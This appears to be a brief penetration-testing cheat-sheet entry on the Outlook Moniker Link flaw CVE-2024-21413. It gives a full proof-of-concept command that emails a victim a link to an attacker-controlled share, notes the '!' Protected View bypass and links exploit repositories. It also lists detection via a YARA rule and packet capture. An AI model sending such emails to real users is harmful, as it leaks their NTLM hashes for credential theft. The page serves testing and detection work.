Moniker Link
Moniker Link CVE-2024-21413
Tool: Responder, SMTP client
PoC: https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
python3 CVE-2024-21413.py --server MAIL_SERVER --port PORT --username USER@DOMAIN.LOCAL --password PASSWORD --sender USER@DOMAIN.LOCAL --recipient VICTIM@DOMAIN.LOCAL --url "\\IP/something" --subject XDSeverity: Critical
Scoring: 9.8
MS Article: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413
Affected MS Office releases:
Example payload: (Moniker Link type: file://)
Outlook's Protected view bypass: (Special character: !)
POC: https://github.com/CMNatic/CVE-2024-21413
Steps:
DETECTION
1) YARA rule written by Florian Roth: https://github.com/Neo23x0/signature-base/blob/master/yara/expl_outlook_cve_2024_21413.yar
2) Wireshark: The SMB request from the victim to the client can be seen in a packet capture with a truncated NetNTLMv2 hash
REMEDIATION
Last updated